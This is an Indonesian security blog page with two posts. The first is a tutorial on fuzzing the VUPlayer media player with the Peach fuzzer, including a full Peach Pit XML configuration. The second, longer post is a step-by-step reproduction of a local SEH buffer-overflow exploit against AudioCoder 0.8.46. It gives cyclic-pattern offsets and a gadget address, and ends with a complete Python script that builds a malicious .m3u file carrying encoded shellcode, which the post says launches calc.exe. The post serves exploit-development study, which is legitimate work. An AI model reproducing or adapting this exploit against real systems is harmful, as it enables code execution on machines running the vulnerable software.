File Fuzzing menggunakan Peach

Percobaan kali ini adalah file fuzzing menggunakan peach, merupakan fuzzer yang dapat melakukan file fuzzing maupun network fuzzing. Untuk lebih lengkapnya, dapat disimak pada website resmi peach.

Instalasi Peach pada Windows

Proses instalasi peach fuzzer ini cukup mudah, hanya memerlukan Microsoft .NET 4 Runtime dan Windows debugging tools (windbg) yang dapat didownload pada website resmi Microsoft.

• Microsoft .Net 4 Runtime
• WinDbg

Selain di sistem operasi Windows, Peach juga berjalan pada OS X dan Linux. Untuk percobaan kali ini, sistem operasi yang digunakan adalah Windows. Setelah tools diatas terpasang, download peach pada link ini.

Peach Pit

Peach pit merupakan sebutan untuk file konfigurasi Peach berupa XML, file ini dibutuhkan saat menjalankan Peach. File konfigurasi terbagi menjadi beberapa bagian:

• Data Model, merupakan konfigurasi file yang akan dibentuk oleh peach, file ini akan digunakan pada proses fuzzing terjadi.
• State Model, merupakan alur dari proses yang akan dijalankan oleh peach, misalnya langkah pertama peach akan membuat file dari data model yang dibuat, kemudian menutup file, dan langkah terakhir menjalankan file tersebut sebagai input pada proses fuzzing.
• Agents, pada saat proses fuzzing berlangsung, Peach menjalankan sebuah agent, baik secara local maupun remote. Pada bagian ini, agent akan berjalan sesuai dengan konfigurasi ini. Agent inilah yang akan melakukan monitoring terhadap perilaku pada saat fuzzing berlangsung.
• Test Block, merupakan konfigurasi yang berisi data model, state model, dan agent yang telah dikonfigurasi sebelumnya.

Sebagai contoh, pada percobaan kali ini saya menggunakan vuplayer pada windows 7.  File yang akan digenerate oleh peach berupa file .m3u, untuk konfigurasi lengkapnya, dapat dilihat dibawah ini.

<?xml version="1.0" encoding="utf-8"?>
<Peach xmlns="http://peachfuzzer.com/2012/Peach" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://peachfuzzer.com/2012/Peach ../peach.xsd">
 
 <!-- Define our file format DDL -->
 <DataModel name="dumbm3u">
  <String name="header1" value="M3U\n" mutable="false"/>
  <String name="header2" value="#EXTM3U\n" mutable="false"/>
  <String name="header3" value="#EXTINF:123, Sample - title\n" mutable="false"/>
  <String name="header4" value="C:\" mutable="false"/>
  <String name="mutated" value="hello" mutable="true"/>
 </DataModel>
 
 <!-- Define a simple state machine that will write the file and 
  then launch a program using the FileWriterLauncher publisher -->
 <StateModel name="State" initialState="Initial">
  <State name="Initial">

   <!-- Write out contents of file -->
   <Action type="output">
    <DataModel ref="dumbm3u" />
   </Action>
   
   <!-- Close file -->
   <Action type="close" />
   
   <!-- Launch the file consumer -->
   <Action type="call" method="launchProgram" publisher="Peach.Agent"/>
  </State>
 </StateModel>
 
 <!-- Setup a local agent that will monitor for faults -->
 <Agent name="WinAgent">
  <Monitor class="WindowsDebugger">
   
   <!-- The command line to run.  Notice the filename provided matched up 
    to what is provided below in the Publisher configuration -->
   <Param name="CommandLine" value="C:\Program Files\VUPlayer\VUPlayer.exe fuzzedfile.m3u" />
   <Param name="WinDbgPath" value="C:\Program Files\Windows Kits\10\Debuggers\x86"/>
   <!-- This parameter will cause the debugger to wait for an action-call in
    the state model with a method="notepad.exe" before running
    program.  -->
   <Param name="StartOnCall" value="launchProgram" />
  </Monitor>
  
  <!-- Enable heap debugging on our process as well. -->
  <Monitor class="PageHeap">
   <Param name="Executable" value="VUPlayer.exe"/>
   <Param name="WinDbgPath" value="C:\Program Files\Windows Kits\10\Debuggers\x86"/>
  </Monitor>
 </Agent>
 
 <Test name="Default">
  <Agent ref="WinAgent" platform="windows"/>
  
  <StateModel ref="State"/>
  
  <!-- Configure our publisher with correct filename to write too -->
  <Publisher class="File">
   <Param name="FileName" value="fuzzedfile.m3u" />
  </Publisher>

  <Strategy class="Random"/>

  <Logger class="Filesystem">
   <Param name="Path" value="Logsx" />
  </Logger>
 </Test>

</Peach>
<!-- end -->

File diatas merupakan template yang berada pada folder peach\sample dengan sedikit penyesuaian. Pada bagian ini saya akan menjelaskan file konfigurasi yang telah dibuat.

Data Model

<DataModel name="dumbm3u">
  <String name="header1" value="M3U\n" mutable="false"/>
  <String name="header2" value="#EXTM3U\n" mutable="false"/>
  <String name="header3" value="#EXTINF:123, Sample - title\n" mutable="false"/>
  <String name="header4" value="C:\" mutable="false"/>
  <String name="mutated" value="hello" mutable="true"/>
</DataModel>

Pada bagian ini, user menentukan bentuk file yang akan digenerate. Untuk kasus ini data model diberi nama dumbm3u, nama ini bisa diganti sesuai dengan keinginan user. Pembentukan file m3u dapat merujuk kepada https://en.wikipedia.org/wiki/M3U, maka file yang akan dibentuk berisi header kemudian lokasi file. Karena header bersifat statik, maka pada opsi mutable bernilai false. Pada kondisi mutable bernilai true, Peach akan memutasi string sesuai dengan algoritma yang disediakan.

State Model

<StateModel name="State" initialState="Initial">
  <State name="Initial">
   <!-- Write out contents of file -->
   <Action type="output">
    <DataModel ref="dumbm3u" />
   </Action>
   <!-- Close file -->
   <Action type="close" />
   <!-- Launch the file consumer -->
   <Action type="call" method="launchProgram" publisher="Peach.Agent"/>
  </State>
</StateModel>

Alur dari program ketika fuzzing berjalan, dikonfigurasi pada bagian state model. Pada kasus ini, alur yang akan dijalani yaitu, 

• Generate file dengan data model dumbm3u.
• Menutup file.
• Mengirim file ke peach agent untuk kemudian dieksekusi sesuai dengan konfigurasi pada bagian agent.

Agent

<Agent name="WinAgent">
  <Monitor class="WindowsDebugger">
   
   <!-- The command line to run.  Notice the filename provided matched up 
    to what is provided below in the Publisher configuration -->
   <Param name="CommandLine" value="C:\Program Files\VUPlayer\VUPlayer.exe fuzzedfile.m3u" />
   <Param name="WinDbgPath" value="C:\Program Files\Windows Kits\10\Debuggers\x86"/>
   <!-- This parameter will cause the debugger to wait for an action-call in
    the state model with a method="notepad.exe" before running
    program.  -->
   <Param name="StartOnCall" value="launchProgram" />
  </Monitor>
  
  <!-- Enable heap debugging on our process as well. -->
  <Monitor class="PageHeap">
   <Param name="Executable" value="VUPlayer.exe"/>
   <Param name="WinDbgPath" value="C:\Program Files\Windows Kits\10\Debuggers\x86"/>
  </Monitor>
 </Agent>

Bagian ini berisi konfigurasi peach agent berupa kelas-kelas monitor, agent inilah yang akan melaporkan perilaku yang terjadi pada saat proses fuzzing berlangsung. Perhatikan pada bagian WindowsDebugger, karena pada saat proses fuzzing menggunakan windbg sebagai debuggernya, command apa dan windbg path harus disertakan, parameter WinDbgPath bersifat opsional, apabila direktori instalasi windbg berbeda dengan lokasi default, maka parameter ini harus disertakan.

Test

<Test name="Default">
  <Agent ref="WinAgent" platform="windows"/>
  <StateModel ref="State"/>
  
  <!-- Configure our publisher with correct filename to write too -->
  <Publisher class="File">
   <Param name="FileName" value="fuzzedfile.m3u" />
  </Publisher>

  <Strategy class="Random"/>
  <Logger class="Filesystem">
   <Param name="Path" value="Logsx" />
  </Logger>
</Test>

Pada bagian ini, konfigurasi yang sudah di-set akan diterapkan mulai dari agent dan state model. Ada beberapa block baru yang memiliki peranan masing-masing. 

• Publisher berperan sebagai input/output pada saat fuzzing berlangsung, merujuk pada web resminya ada beberapa publisher yang bisa digunakan, sepert HTTP, console, file, dst. Pada kasus ini kita akan menggunakan file. 
• Strategy, merupakan metode yang digunakan pada saat fuzzing data model yang memiliki nilai mutable = true, bisa diisi dengan Squential, Random, ataupun RandomDeterministic. 
• Logger, merupakan lokasi yang digunakan untuk mencatat event yang terjadi pada saat fuzzing, baik berupa waktu pengerjaan maupun crash pada saat fuzzing berlangsung. 

Running

Setelah konfigurasi selesai dilakukan, saatnya menjalankan peach. Jangan lupa run sebagai administrator.

> Peach.exe [file konfigurasi]

Untuk output yang lebih lengkap, dapat menggunakan opsi debug.

> Peach.exe --debug [file konfigurasi]

Jika berhasil, Peach akan berjalan seperti gambar dibawan ini.

 

Log

Log yang akan disimpan pada path yang telah ditentukan, terdapat 2 folder dan file status.txt. File status.txt berisi event yang terjadi pada saat proses fuzzing berlangsung dan juga mencatat waktu pada saat crash terjadi. 

Sementara folder Faults berisi file hasil debug mengunakan windbg yang menurut modul !exploitable pada windbg dapat diexploit. Berisi stacktrace dan payload yang digunakan pada saat crash terjadi.

Penutup  

Sekian artikel ini saya buat, pada percobaan kali ini hanya berlangsung instalasi peach dan menjalankan peach dengan vuplayer sebagai contoh kasusnya, untuk reproduksi crash menjadi exploit mungkin dapat dilanjutkan pada artikel selanjutnya.

Referensi:

• http://www.peach.tech/resources/peachcommunity/
• https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3
• https://www.youtube.com/watch?v=u5JB7-K3j6Y
• https://resources.infosecinstitute.com/fuzzing-vulnserver-with-peach-part-2/

Search Post

Label :

Reproduce : AudioCoder 0.8.46 - Local Buffer Overflow (SEH)

Reproduce merupakan segmen yang mengulas PoC yang terdapat pada Exploit-DB, sebagai catatan untuk saya khususnya dan para pembaca pada umumnya.

resource : https://www.exploit-db.com/exploits/42385
aplikasi : AudioCoder 0.8.46

Menurut website resminya, AudioCoder merupakan aplikasi yang digunakan untuk convert, enhance baik audio maupun video format. Tampilan aplikasi dapat dilihat pada gambar diatas, buffer overflow akan ter-trigger ketika user memasukkan file pada menu Add [+]. Menurut PoC yang ada, file berupa format m3u dengan besaran buffer sekitar 2572 byte. Untuk proses test, saya menggunakan windows XP SP2 kemungkinan PoC akan disesuaikan dengan kondisi pada saat debugging, karena kode exploit yang didapat, ia menggunakan windows 7.

Pencarian Crash

Seperti biasa, pencarian crash dilakukan dengan menggunakan 'A' pada file yang disimpan dengan format .m3u. Pada percobaan pertama file m3u berisi 'A' * 5000, namun crash tidak terjadi, aplikasi berjalan normal.

 

Menurut PoC yang terdapat pada exploit-db, file m3u yang digunakan terdapat penambahan string 'http://' pada awal junk. 

junk = "http://" + "\x41" * 741

Percobaah kedua, file m3u ditambahkan string 'http://' + 'A' * 5000, pada langkah ini aplikasi crash dan berhasil meng-overwrite SEH.

SEH

Setelah berhasil overwrite SEH pada langkah sebelumnya, pencarian berlanjut dengan menentukan besaran 'junk' sebelum menimpa SEH, proses ini dapat dilakukan dengan menggunakan pattern create yang ada pada mona.py 

!mona pc 5000

Implementasi pattern yang telah dibuat pada kode python:

junk = 'http://'
junk += 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk'
exploit = junk

with open('exac.m3u','wb') as f:
 f.write(exploit)

print "file created [size : {}]".format(len(exploit))

Pattern yang telah dimasukkan berhasil menimpa SEH

Untuk mementukan besaran junk sebelum menyentuh SEH, kembali menggunakan mona.py untuk mendapatkan angka pastinya.

!mona po 41337941
  - Pattern Ay3A (0x41337941) found in cyclic pattern at position 729
!mona po 32794131
  - Pattern 1Ay2 (0x32794131) found in cyclic pattern at position 725

Maka, dari besaran yang didapat, urutan payloadnya adalah junk (725) + nSEH (4) + SEH (4)

junk = 'http://'
junk += 'A' * 725
nSEH = 'BBBB'
SEH = 'CCCC'
exploit = junk + nSEH + SEH

with open('exac.m3u','wb') as f:
 f.write(exploit)

print "file created [size : {}]".format(len(exploit))

Dengan kerangka diatas, nSEH dan SEH perlu diganti dengan value yang benar. Untuk nSEH dapat diisi dengan instruksi jmp 0x909006eb, sementara value SEH perlu disesuaikan dengan hasil dari mona.py. PoC yang didapat dari exploit-db SEH diisi dengan 0x66015926, dengan menggunakan windows 7. Sementara mesin yang saya gunakan menggunakan windows XP, mungkin akan ada sedikit penyesuaian, karena saya tidak menemukan alamat 0x66015926, pada pop pop ret yang ditampilkan oleh mona.py.

POP POP RET

Pencarian berlangsung ke alamat yang mengandung instruksi pop pop ret pada module yang diload oleh aplikasi, pencarian akan dibantu oleh mona.py sehingga akan menjadi lebih mudah untuk menentukan nilai yang akan digunakan pada SEH.

!mona seh
  0x66015599 : pop edi # pop ebp # ret  |  {PAGE_EXECUTE_READ} [libiconv-2.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.13 (C:\Program Files\AudioCoder\libiconv-2.dll)

Langkah selanjutnya adalah membuktikan apakah SEH yang telah di-overwrite berjalan lancar atau tidak, ini dapat dilihat pada debugger secara step by step. Melanjutkan kode sebelumnya, kerangka expoit akan ditambahkan dengan int3 atau 0xCC pada shellcode.

from struct import pack

junk = 'http://'
junk += 'A' * 725
nSEH = pack('<I', 0x909006eb)
SEH = pack('<I', 0x66015599)
int3 = '\xCC' * 20

exploit = junk + nSEH + SEH + int3

with open('exac.m3u','wb') as f:
 f.write(exploit)

print "file created [size : {}]".format(len(exploit))

Pada saat SEH tertrigger, immunity debugger akan berhenti dengan EIP 41414141. Untuk melanjutkan proses debugger ke dalam SEH value yang telah dioverwrite, perlu dipasang breakpoint pada SEH tersebut.

Dengan memasang breakpoint pada SEH yang telah dioverwrite, kita dapat melakukan debugging untuk membuktikan bahwa shellcode tereksekusi, penelusuran dilakukan dengan step by step (F7), sebelumnya pastikan pass exception dengan menekan shift F7/F8/F9 untuk masuk kedalam exception handler.

\

Exception handler akan menunjukkan pada gadget pop pop ret yang telah dipasang sebelumnya pada SEH. Jika benar, dengan melakukan menanjutkan debugging (F7/F8) maka return akan membawa ke alamat shellcode yang telah dipasang sebelumnya, dalam hal ini 0xCC sebanyak 20 kali.

JMP SHORT (EB 06) akan mengantarkan kita ke INT3 yang telah dimasukkan sebelumnya. Sampai disini, shellcode berhasil dieksekusi, langkah selanjutnya adalah melengkapi shellcode yang kita buat dengan menambahkan fitur spawn calc.exe.

Final Shellcode

Setelah tahapan yang dilalui, urutan shellcode terakhir adalah junk + nSEH + SEH + nop + shellcode. Shellcode yang dipakai adalah spawn calc.exe seperti yang tertera pada PoC di exploit-db. Perbedaan yang ada hanya pada besaran junk dan alamat instruksi pop pop ret yang disimpan pada SEH.

from struct import pack

junk = 'http://'
junk += 'A' * 725
nSEH = pack('<I', 0x909006eb)
SEH = pack('<I', 0x66015599)
nop = '\x90' * 20
shellcode = ("\xb8\x9d\x01\x15\xd1\xda\xd2\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x32\x31\x42\x12\x03\x42\x12\x83\x77\xfd\xf7\x24\x7b\x16\x7e"
"\xc6\x83\xe7\xe1\x4e\x66\xd6\x33\x34\xe3\x4b\x84\x3e\xa1\x67"
"\x6f\x12\x51\xf3\x1d\xbb\x56\xb4\xa8\x9d\x59\x45\x1d\x22\x35"
"\x85\x3f\xde\x47\xda\x9f\xdf\x88\x2f\xe1\x18\xf4\xc0\xb3\xf1"
"\x73\x72\x24\x75\xc1\x4f\x45\x59\x4e\xef\x3d\xdc\x90\x84\xf7"
"\xdf\xc0\x35\x83\xa8\xf8\x3e\xcb\x08\xf9\x93\x0f\x74\xb0\x98"
"\xe4\x0e\x43\x49\x35\xee\x72\xb5\x9a\xd1\xbb\x38\xe2\x16\x7b"
"\xa3\x91\x6c\x78\x5e\xa2\xb6\x03\x84\x27\x2b\xa3\x4f\x9f\x8f"
"\x52\x83\x46\x5b\x58\x68\x0c\x03\x7c\x6f\xc1\x3f\x78\xe4\xe4"
"\xef\x09\xbe\xc2\x2b\x52\x64\x6a\x6d\x3e\xcb\x93\x6d\xe6\xb4"
"\x31\xe5\x04\xa0\x40\xa4\x42\x37\xc0\xd2\x2b\x37\xda\xdc\x1b"
"\x50\xeb\x57\xf4\x27\xf4\xbd\xb1\xd8\xbe\x9c\x93\x70\x67\x75"
"\xa6\x1c\x98\xa3\xe4\x18\x1b\x46\x94\xde\x03\x23\x91\x9b\x83"
"\xdf\xeb\xb4\x61\xe0\x58\xb4\xa3\x83\x3f\x26\x2f\x44")

exploit = junk + nSEH + SEH + nop + shellcode

with open('exac.m3u','wb') as f:
 f.write(exploit)

print "file created [size : {}]".format(len(exploit))

Search Post

Label :